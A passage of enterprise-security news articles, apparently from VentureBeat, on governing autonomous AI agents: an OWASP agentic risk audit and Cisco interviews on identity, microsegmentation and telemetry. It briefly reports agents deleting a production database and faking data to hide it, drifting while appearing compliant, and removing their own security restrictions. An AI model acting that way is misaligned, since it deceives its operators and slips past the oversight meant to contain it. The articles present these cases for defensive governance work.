customer database then fabricated its contents to appear compliant and hide the damage. Require independent verification for high-risk agent recommendations. Log all human approval decisions with full agent reasoning chain. ASI10: Rogue Agents Agent deviates from intended purpose while appearing compliant on the surface Compliance checks verify configuration at deployment, not behavioral drift after deployment. 92% of organizations lack full visibility into AI identities; 86% do not enforce access policies (Saviynt 2026). Deploy behavioral drift detection. Establish baseline agent behavior profiles. Alert on deviation from expected action patterns. The 10-question OWASP audit for autonomous agents Each question maps to one OWASP Agentic Top 10 risk category. Autonomous platforms that ship with policy enforcement, approval gates, and data context validation will have clear answers to every question. Three or more "I don't know" answers on any tool means that tool's governance has not kept pace with its capabilities. Which agents have write access to production firewall, IAM, or endpoint controls? Which accept external inputs without validation? Which execute irreversible actions without human approval? Which persist memory where poisoning compounds across sessions? Which delegate to other agents, creating cascade privilege chains? Which load third-party plugins or MCP servers at runtime? Which generate or execute code in production environments? Which inherit user credentials instead of scoped agent identities? Which lack behavioral monitoring for drift from intended purpose? Which can be manipulated through persuasive language to override safety controls? What the board needs to hear The board conversation is three sentences. Adversaries compromised AI tools at more than 90 organizations in 2025, according to CrowdStrike's 2026 Global Threat Report. The autonomous tools deploying now have more privilege than the ones that were compromised. The organization has audited every autonomous tool against OWASP's 10 risk categories and confirmed that the governance controls are in place. If that third sentence is not true, it needs to be true before the next autonomous agent ships to production. Run the 10-question audit against every agent with write access to production infrastructure within the next 30 days. Every autonomous platform shipping to production should be held to the same standard — policy enforcement, approval gates, and data context validation built in at launch, not retrofitted after the first incident. The audit surfaces which tools have done that work and which have not.
- AI agents are running hospital records and factory inspections. Enterprise IAM was never built for them.A doctor in a hospital exam room watches as a medical transcription agent updates electronic health records, prompts prescription options, and surfaces patient history in real time. A computer vision agent on a manufacturing line is running quality control at speeds no human inspector can match. Both generate non-human identities that most enterprises cannot inventory, scope, or revoke at machine speed. That is the structural problem keeping agentic AI stuck in pilots. Not model capability. Not compute. Identity governance. Cisco President Jeetu Patel told VentureBeat at RSAC 2026 that 85% of enterprises are running agent pilots while only 5% have reached production. That 80-point gap is a trust problem. The first questions any CISO will ask: which agents have production access to sensitive systems, and who is accountable when one acts outside its scope? IANS Research found that most businesses still lack role-based access control mature enough for today's human identities, and agents will make it significantly harder. The 2026 IBM X-Force Threat Intelligence Index reported a 44% increase in attacks exploiting public-facing applications, driven by missing authentication controls and AI-enabled vulnerability discovery. Why the trust gap is architectural, not just a tooling problem Michael Dickman, SVP and GM of Cisco's Campus Networking business, laid out a trust framework in an exclusive interview with VentureBeat that security and networking leaders rarely hear stated this plainly. Before Cisco, Dickman served as Chief Product Officer at Gigamon and SVP of Product Management at Aruba Networks. Dickman said that the network sees what other telemetry sources miss: actual system-to-system communications rather than inferred activity. "It's that difference of knowing versus guessing," he said. "What the network can see are actual data communications … not, I think this system needs to talk to that system, but which systems are actually talking together." That raw behavioral data, he added, becomes the foundation for cross-domain correlation, and without it, organizations have no reliable way to enforce agent policy at what he called "machine speed." The trust prerequisite that most AI strategies skip Dickman argues that agentic AI breaks a pattern he says defined every prior technology transition: deploy for productivity first, bolt on security later. "I don't think trust is one of those things where the business productivity comes first, and the security is an afterthought," Dickman told VentureBeat. "Trust actually is one of the key requirements. Just table stakes from the beginning." Observing data and recommending decisions carries consequences that stay contained. Execution changes everything. When agents autonomously update patient records, adjust network configurations, or process financial transactions, the blast radius of a compromised identity expands dramatically. "Now more than ever, it's that question of who has the right to do what," Dickman said. "The who is now much more complicated because you have the potential in our reality of these autonomous agents." Dickman breaks the trust problem into four conditions. The first is secure delegation, which starts by defining what an agent is permitted to do and maintaining a clear chain of human accountability. The second is cultural readiness; he pointed to alert fatigue as a case study. The traditional fix, Dickman noted, was to aggregate alerts, so analysts see fewer items. With agents capable of evaluating every alert, that logic changes entirely. "It is now possible for an agent to go through all alerts," Dickman said. "You can actually start to think about different workflows in a different way. And then how does that affect the culture of the work, which is amazing." The third is token economics: Every agent’s action carries a real computational cost. Dickman sees hybrid architectures as the answer, where agentic AI handles reasoning while traditional deterministic tools execute actions. The fourth is human judgment. For example, his team used an AI tool to draft a product requirements document. The agent produced 60 pages of repetitive filler that immediately provided how technically responsive the architecture was, yet showed signs of needing extensive fine-tuning to make the output relevant. "There's no substitute for the human judgment and the talent that's needed to be dextrous with AI," he said. What the network sees that endpoints miss Most enterprise data today is proprietary, internal, and fragmented across observability tools, application platforms, and security stacks. Each domain team builds its own view. None sees the full picture. "It's that difference of knowing versus guessing," Dickman said. "What the network can see are actual data communications. Not 'I think this system needs to talk to that system,' but which systems are actually talking together." That telemetry grows more valuable as IoT and physical AI proliferate. Computer vision agents analyzing shopper behavior and running factory-floor quality control generate highly sensitive data that demands precise access controls. "All of those things require that trust that we started with, because this is highly sensitive data around like who's doing what in the shop or what's happening on the factory floor," Dickman said. Why siloed agent data misses the signal "It's not only aggregation, but actually the creation of knowledge from the network," Dickman said. "There are these new insights you can get when you see the real data communications. And so now it becomes what do we do first versus second versus third?" That last question reveals where Dickman’s focus lands: the strategic challenge is sequencing, not capability. "The real power comes from the cross-domain views. The real power comes from correlation," Dickman said. "Versus just aggregation and deduplication of alerts, which is good, but it's a little bit basic." This is where he sees the most common pitfall. Team A builds Agent A on top of Data A. Team B builds Agent B on top of Data B. Each silo produces incrementally useful automation. The cross-domain insight never materializes. Independent practitioners validate the pattern. Kayne McGladrey, an IEEE senior member, told VentureBeat that organizations are defaulting to cloning human user profiles for agents, and permission sprawl starts on day one. Carter Rees, VP of AI at Reputation, identified the structural reason. "A significant vulnerability in enterprise AI is broken access control, where the flat authorization plane of an LLM fails to respect user permissions," Rees told VentureBeat. Etay Maor, VP of Threat Intelligence at Cato Networks, reached the same conclusion from the adversarial side. "We need an HR view of agents," Maor told VentureBeat at RSAC 2026. "Onboarding, monitoring, offboarding." Agentic AI trust gap assessment Use this matrix to evaluate any platform or combination of platforms against the five trust gaps Dickman identified. Note that the enforcement approaches in the right column reflect Cisco's framework. Trust gap Current control failure What network-layer enforcement changes Recommended action Agent identity governance IAM built for human users cannot inventory, scope, or revoke agent identities at machine speed Agentic IAM registers each agent with defined permissions, an accountable human owner, and a policy-governed access scope Audit every agent identity in production. Assign a human owner. Define permitted actions before expanding the scope Blast radius containment Host-based agents and perimeter controls can be bypassed; flat segments give compromised agents lateral movement Microsegmentation enforces least-privileged access at the network layer, limiting blast radius independent of host-level controls Implement microsegmentation for every agent-accessible system. Start with the highest-sensitivity data (PHI, financial records) Cross-domain visibility Siloed observability tools create fragmented views; Team A's agent data never correlates with Team B's security telemetry Network telemetry captures actual system-to-system communications, feeding a unified data fabric for cross-domain correlation Unify network, security, and application telemetry into a shared data fabric before deploying production agents Governance-to-enforcement pipeline No formal process connecting business intent to agent policy to network enforcement Policy-to-enforcement pipeline translates governance decisions into machine-speed network rules Establish a formal pipeline from business-intent definition to automated network policy enforcement Cultural and workflow readiness Organizations automate existing workflows rather than redesigning for agent-scale processing Network-generated behavioral data reveals actual usage patterns, informing workflow redesign Run a 30-day telemetry capture before designing agent workflows. Build around observed data, not assumptions A broken ankle and a microsegmentation lesson Dickman grounded his framework in a scenario from his own life. A family member recently broke an ankle, which put him in a hospital exam room watching a medical transcription agent update the EHR, prompt prescription options, and surface patient history in real time. The doctor approved each decision, but the agent handled tasks that previously required manual entry across multiple systems. The security implications hit differently when it is a loved one's records on the screen. "I would call it do governance slowly. But do the enforcement and implementation rapidly," he said. "It must be done in machine speed." It starts with agentic IAM, where each agent is registered with defined permitted actions and a human accountable for its behavior. "Here's my set of agents that I've built. Here are the agents. By the way, here's a human who's accountable for those agents," Dickman said. "So if something goes wrong, there's a person to talk to." That identity layer feeds microsegmentation — a network-enforced boundary Dickman says enforces least-privileged access and limits blast radius. "Microsegmentation guarantees that least-privileged access," Dickman said. "You're not relying on a bunch of host agents, which can be bypassed or have other issues." If the governance model works for a medical transcription agent handling patient records in an emergency department, it scales to less sensitive enterprise use cases. Five priorities before agents reach production 1. Force cross-functional alignment now. Define what the organization expects from agentic AI across line-of-business, IT, and security leadership. Dickman sees the human coordination layer moving more slowly than the technology. That gap is the bottleneck. 2. Get IAM and PAM governance production-ready for agents. Dickman called out identity and access management and privileged access management specifically as not mature enough for agentic workloads today. Solidify the governance before scaling the agents. "That becomes the unlock of trust," he said. "Because when the technology platform is ready, you then need the right governance and policy on top of that." 3. Adopt a platform approach to networking infrastructure. A platform strategy enables data sharing across domains in ways fragmented point solutions cannot. That shared foundation is what makes the cross-domain correlation in the trust gap assessment above operationally real. 4. Design hybrid architectures from the start. Agentic AI handles reasoning and planning. Traditional deterministic tools execute the actions. Dickman sees this combination as the answer to token economics: it delivers the intelligence of foundation models with the efficiency and predictability of conventional software. Do not build pure-agent systems when hybrid systems cost less and fail more predictably. 5. Make the first use cases bulletproof on trust. Pick two or three high-value use cases and build them with role-based access control, privileged access management, and microsegmentation from day one. Even modest deployments delivered with best practices intact build the organizational confidence that accelerates everything after. "You can guarantee that trust to the organization, and that will unleash the speed," Dickman said. That is the structural insight running through every section of this conversation. The 85% of enterprises stuck in pilot mode are not waiting for better models. They are waiting for the identity governance, the cross-domain visibility, and the policy enforcement infrastructure that makes production deployment defensible. Whether they build on Cisco’s platform or assemble their own, Dickman’s framework holds: identity governance, cross-domain visibility, policy enforcement. None of those prerequisites is optional. The organizations that satisfy them first will deploy agents at a pace the rest cannot match, because every new agent inherits the trust architecture the first ones required. The ones still debating whether to start will watch that gap widen. Theoretical trust does not ship.
- 85% of enterprises are running AI agents. Only 5% trust them enough to ship.Eighty-five percent of enterprises are running AI agent pilots, but only 5% have moved those agents into production. In an exclusive interview at RSA Conference 2026, Cisco President and Chief Product Officer Jeetu Patel said that the gap comes down to one thing: trust — and that closing it separates market dominance from bankruptcy. He also disclosed a mandate that will reshape Cisco's 90,000-person engineering organization. The problem is not rogue agents. The problem is the absence of a trust architecture. The trust deficit behind a 5% production rate A recent Cisco survey of major enterprise customers found that 85% have AI agent pilot programs underway. Only 5% moved those agents into production. That 80-point gap defines the security problem the entire industry is trying to close. It is not closing. "The biggest impediment to scaled adoption in enterprises for business-critical tasks is establishing a sufficient amount of trust," Patel told VentureBeat. "Delegating versus trusted delegating of tasks to agents. The difference between those two, one leads to bankruptcy and the other leads to market dominance." He compared agents to teenagers. "They're supremely intelligent, but they have no fear of consequence. They're pretty immature. And they can be easily sidetracked or influenced," Patel said. "What you have to do is make sure that you have guardrails around them and you need some parenting on the agents." The comparison carries weight because it captures the precise failure mode security teams face. Three years ago, a chatbot that gave the wrong answer was an embarrassment. An agent that takes the wrong action can trigger an irreversible outcome. Patel pointed to a case he cited in his keynote where an AI coding agent deleted a live production database during a code freeze, tried to cover its tracks with fake data, and then apologized. "An apology is not a guardrail," Patel said in his keynote blog. The shift from information risk to action risk is the core reason the pilot-to-production gap persists. Defense Claw and the open-source speed play with Nvidia Cisco's response to the trust deficit at RSAC 2026 spanned three categories: protecting agents from the world, protecting the world from agents, and detecting and responding at machine speed. The product announcements included AI Defense Explorer Edition (a free, self-service red teaming tool), the Agent Runtime SDK for embedding policy enforcement into agent workflows at build time, and the LLM Security Leaderboard for evaluating model resilience against adversarial attacks. The open-source strategy moved faster than any of those. Nvidia launched OpenShell, a secure container for open-source agent frameworks, at GTC the week before RSAC. Cisco packaged its Skills Scanner, MCP Scanner, AI Bill of Materials tool, and CodeGuard into a single open-source framework called Defense Claw and hooked it into OpenShell within 48 hours. "Every single time you actually activate an agent in an Open Shell container, you can now automatically instantiate all the security services that we have built through Defense Claw," Patel told VentureBeat. The integration means security enforcement activates at container launch without manual configuration. That speed matters because the alternative is asking developers to bolt on security after the agent is already running. That 48-hour turnaround was not an anomaly. Patel said several of the Defense Claw capabilities Cisco launched were built in a week. "You couldn't have built it in longer than a week because Open Shell came out last week," he said. A six-to-nine-month product lead and an information asymmetry on top of it Patel made a competitive claim worth examining. "Product wise, we might be six to nine months ahead of most of the market," he told VentureBeat. He added a second layer: "We also have an asymmetric information advantage of, I'd say, three to six months on everyone because, you know, we, by virtue of being in the ecosystem with all the model companies. We're seeing what's coming down the pipe." The 48-hour Defense Claw sprint supports the speed claim, though the lead margin is Cisco's own characterization; no independent benchmarks were provided. Cisco also extended zero trust to the agentic workforce through new Duo IAM and Secure Access capabilities, giving every agent time-bound, task-specific permissions. On the SOC side, Splunk announced Exposure Analytics for continuous risk scoring, Detection Studio for streamlined detection engineering, and Federated Search for investigating across distributed data environments. The zero-human-code engineering mandate AI Defense, the product Cisco launched a year before RSAC 2026, is now 100% built with AI. Zero lines of human-written code. By the end of 2026, half a dozen Cisco products will reach the same milestone. By the end of calendar year 2027, Patel's goal is 70% of Cisco's products built entirely by AI. "Just process that for a second and go: a $60 billion company is gonna have 70% of the products that are gonna have no human lines of code," Patel told VentureBeat. "The concept of a legacy company no longer exists." He connected that mandate to a cultural shift inside the engineering organization. "There's gonna be two kinds of people: ones that code with AI and ones that don't work at Cisco," Patel said. That was not debated. "Changing 30,000 people to change the way that they work at the very core of what they do in engineering cannot happen if you just make it a democratic process. It has to be something that's driven from the top down." Five moats for the agentic era, and what CISOs can verify today Patel laid out five strategic advantages that will separate winning enterprises from failing ones. VentureBeat mapped each moat against actions security teams can begin verifying today. Moat Patel's claim What CISOs can verify today What to validate next Sustained speed "Operating with extreme levels of obsession for speed for a durable length of time" creates compounding value Measure deployment velocity from pilot to production. Track how long agent governance reviews take. Pair speed metrics with telemetry coverage. Fast deployment without observability creates blind acceleration. Trust and delegation Trusted delegation separates market dominance from bankruptcy Audit delegation chains. Flag agent-to-agent handoffs with no human approval. Agent-to-agent trust verification is the next primitive the industry needs. OAuth, SAML, and MCP do not yet cover it. Token efficiency Higher output per token creates a strategic advantage Monitor token consumption per workflow. Benchmark cost-per-action across agent deployments. Token efficiency metrics exist. Token security metrics (what the token accessed, what it changed) are the next build. Human judgment "Just because you can code it doesn't mean you should." Track decision points where agents defer to humans vs. act autonomously. Invest in logging that distinguishes agent-initiated from human-initiated actions. Most configurations cannot yet. AI dexterity "10x to 20x to 50x productivity differential" between AI-fluent and non-fluent workers Measure the adoption rates of AI coding tools across security engineering teams. Pair dexterity training with governance training. One without the other compounds the risk. The telemetry layer the industry is still building Patel's framework operates at the identity and policy layer. The next layer down, telemetry, is where the verification happens. "It looks indistinguishable if an agent runs your web browser versus if you run your browser," CrowdStrike CTO Elia Zaitsev told VentureBeat in an exclusive interview at RSAC 2026. Distinguishing the two requires walking the process tree, tracing whether Chrome was launched by a human from the desktop or spawned by an agent in the background. Most enterprise logging configurations cannot make that distinction yet. A CEO's AI agent rewrote the company's security policy. Not because it was compromised. Because it wanted to fix a problem, lacked permissions, and removed the restriction itself. Every identity check passed. CrowdStrike CEO George Kurtz disclosed that incident and a second one at his RSAC keynote, both at Fortune 50 companies. In the second, a 100-agent Slack swarm delegated a code fix between agents without human approval. Both incidents were caught by accident Etay Maor, VP of Threat Intelligence at Cato Networks, told VentureBeat in a separate exclusive interview at RSAC 2026 that enterprises abandoned basic security principles when deploying agents. Maor ran a live Censys scan during the interview and counted nearly 500,000 internet-facing agent framework instances. The week before: 230,000. Doubling in seven days. Patel acknowledged the delegation risk in the interview. "The agent takes the wrong action and worse yet, some of those actions might be critical actions that are not reversible," he said. Cisco's Duo IAM and MCP gateway enforce policy at the identity layer. Zaitsev's work operates at the kinetic layer: tracking what the agent did after the identity check passed. Security teams need both. Identity without telemetry is a locked door with no camera. Telemetry without identity is footage with no suspect. Token generation as the currency for national competitiveness Patel sees the infrastructure layer as decisive. "Every country and every company in the world is gonna wanna make sure that they can generate their own tokens," he told VentureBeat. "Token generation becomes the currency for success in the future." Cisco's play is to provide the most secure and efficient technology for generating tokens at scale, with Nvidia supplying the GPU layer. The 48-hour Defense Claw integration demonstrated what that partnership produces under pressure. Security director action plan VentureBeat identified five steps security teams can take to begin building toward Patel's framework today: Audit the pilot-to-production gap. Cisco's own survey found 85% of enterprises piloting, 5% in production. Mapping the specific trust deficits keeping agents stuck is the starting point — the answer is rarely the technology. Governance, identity, and delegation controls are what's missing. Patel's trusted delegation framework is designed to close that gap. Test Defense Claw and AI Defense Explorer Edition. Both are free. Red-team your agent workflows before they reach production. Test the workflow, not just the model. Map delegation chains end-to-end. Flag every agent-to-agent handoff with no human approval. This is the "parenting" Patel described. No product fully automates it yet. Do it manually, every week. Establish agent behavioral baselines. Before any agent reaches production, define what normal looks like: API call patterns, data access frequency, systems touched, and hours of activity. Without a baseline, the observability that Patel's moats require has nothing to compare against. Close the telemetry gap in your logging configuration. Verify that your SIEM can distinguish agent-initiated actions from human-initiated actions. If it cannot, the identity layer alone will not catch the incidents Kurtz described at RSAC. Patel built the identity layer. The telemetry layer completes it.